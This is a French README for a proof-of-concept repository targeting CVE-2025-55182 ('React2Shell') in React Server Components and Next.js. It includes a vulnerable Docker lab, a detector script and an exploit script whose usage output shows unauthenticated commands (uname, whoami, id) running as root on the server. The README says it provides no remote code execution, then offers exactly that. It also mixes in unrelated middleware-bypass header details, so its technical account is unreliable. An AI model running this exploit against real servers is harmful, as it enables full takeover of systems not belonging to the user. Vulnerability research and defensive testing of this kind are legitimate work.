
PoC : CVE-2025-55182 (React) et CVE-2025-66478 (Next.js)
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cette recherche
Fournie strictement à des fins éducatives et défensives
Ce dépôt contient un petit laboratoire et une analyse de preuve de concept (PoC) pour CVE-2025-55182 et son doublon CVE-2025-66478, liés aux React Server Components (RSC) de Next.js et au comportement de contournement de l'autorisation du middleware.
L'objectif de ce PoC est de reproduire les conditions de flux de requête interne nécessaires à la vulnérabilité, d'analyser le comportement du middleware et de comprendre comment x-middleware-subrequest affecte les routes protégées sous des configurations spécifiques.
Ce dépôt ne fournit pas d'exécution de code à distance
Il fournit un environnement contrôlé pour étudier :
Le NVD classe actuellement CVE-2025-66478 comme :
Rejected reason: This CVE is a duplicate of CVE-2025-55182
Le comportement existe toujours ; seul l'identifiant a changé lors de la consolidation.
x-middleware-subrequest: 1
X-Powered-By: Next.js
x-middleware-rewrite: /...
Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Url, Accept-Encoding
nextjs-vuln/
│
├── Dockerfile
├── package.json
├── middleware.js
│
└── app/
├── page/
│ └── index.js
│
├── protected/
│ └── page.js
│
└── api/
└── admin/
└── secret/
└── route.js
docker build -t nextjs-vuln .
docker run -p 3000:3000 nextjs-vuln
Ce dépôt inclut un script d'aide NextJs.py pour analyser :
Exemple :
python3 NextJs.py -u http://localhost:3000
krakhen@kapz:~$ python3 NextJs.py -u http://localhost:3000
Next.js React2Shell Passive Detector
------------------------------------
[+] Target URL : http://127.0.0.1:3000
[+] Timeout : 10s
[+] TLS verify : enabled
=== Fingerprint ===
- Next.js detected via headers.
- React Server Components (RSC) detected.
- Inferred Next.js generation: Next.js (generation unclear)
=== React2Shell Probe ===
- Benign React Flight gadget executed and returned marker digest.
- This strongly suggests React2Shell / CVE-2025-55182 style vulnerability.
=== Summary ===
Timestamp (UTC): 2025-12-05T22:04:25.089044+00:00
Target : http://127.0.0.1:3000
HTTP status : 500
Digest : REACT2SHELL_PROBE
Verdict : LIKELY_VULNERABLE to React2Shell-style exploit path
Response body (truncated):
0:{"a":"$@1","f":"","b":"development"} 1:E{"digest":"REACT2SHELL_PROBE","message":"NEXT_REDIRECT","stack":[],"env":"Server"}
Cet outil permet d'exécuter du code à distance de manière arbitraire sans authentification.
Utilisation :
krakhen@kapz:~/$ python poc-cve-2025-55182.py -u http://127.0.0.1:3000 -c "uname -a"
React2Shell PoC - CVE-2025-55182
---------------------------------
[+] Target URL : http://127.0.0.1:3000
[+] Command : uname -a
[+] Sending crafted Flight payload...
[+] HTTP status: 500
[✓] RCE confirmed. Command output:
Linux 5596495ec378 6.11.0-29-generic #29-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 13 20:29:41 UTC 2025 x86_64 Linux
krakhen@kapz:~/$ python poc-cve-2025-55182.py -u http://127.0.0.1:3000 -c "whoami"
React2Shell PoC - CVE-2025-55182
---------------------------------
[+] Target URL : http://127.0.0.1:3000
[+] Command : whoami
[+] Sending crafted Flight payload...
[+] HTTP status: 500
[✓] RCE confirmed. Command output:
root
krakhen@kapz:~/$ python poc-cve-2025-55182.py -u http://127.0.0.1:3000 -c "id"
React2Shell PoC - CVE-2025-55182
---------------------------------
[+] Target URL : http://127.0.0.1:3000
[+] Command : id
[+] Sending crafted Flight payload...
[+] HTTP status: 500
[✓] RCE confirmed. Command output:
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
POST / 500 in 10ms
⨯ next/dist/compiled/react-server-dom-webpack/cjs/react-server-dom-webpack-server.node.development.js (3158:34) @ get
⨯ Internal error: Error: NEXT_REDIRECT
at Object.eval [as then] (eval at <anonymous> (/app/node_modules/next/dist/compiled/next-server/app-page.runtime.dev.js:122:67039), <anonymous>:3:132)
at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
digest: "Linux 5596495ec378 6.11.0-29-generic #29-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 13 20:29:41 UTC 2025 x86_64 Linux"
3156 | return (
3157 | (obj = parseInt(value.slice(2), 16)),
> 3158 | response._formData.get(response._prefix + obj)
| ^
3159 | );
3160 | }
3161 | switch (value[1]) {
POST / 500 in 11ms
⨯ next/dist/compiled/react-server-dom-webpack/cjs/react-server-dom-webpack-server.node.development.js (3158:34) @ get
⨯ Internal error: Error: NEXT_REDIRECT
at Object.eval [as then] (eval at <anonymous> (/app/node_modules/next/dist/compiled/next-server/app-page.runtime.dev.js:122:67039), <anonymous>:3:130)
at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
digest: "root"
3156 | return (
3157 | (obj = parseInt(value.slice(2), 16)),
> 3158 | response._formData.get(response._prefix + obj)
| ^
3159 | );
3160 | }
3161 | switch (value[1]) {
POST / 500 in 11ms
⨯ next/dist/compiled/react-server-dom-webpack/cjs/react-server-dom-webpack-server.node.development.js (3158:34) @ get
⨯ Internal error: Error: NEXT_REDIRECT
at Object.eval [as then] (eval at <anonymous> (/app/node_modules/next/dist/compiled/next-server/app-page.runtime.dev.js:122:67039), <anonymous>:3:126)
at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
digest: "uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"
3156 | return (
3157 | (obj = parseInt(value.slice(2), 16)),
> 3158 | response._formData.get(response._prefix + obj)
| ^
3159 | );
3160 | }
3161 | switch (value[1]) {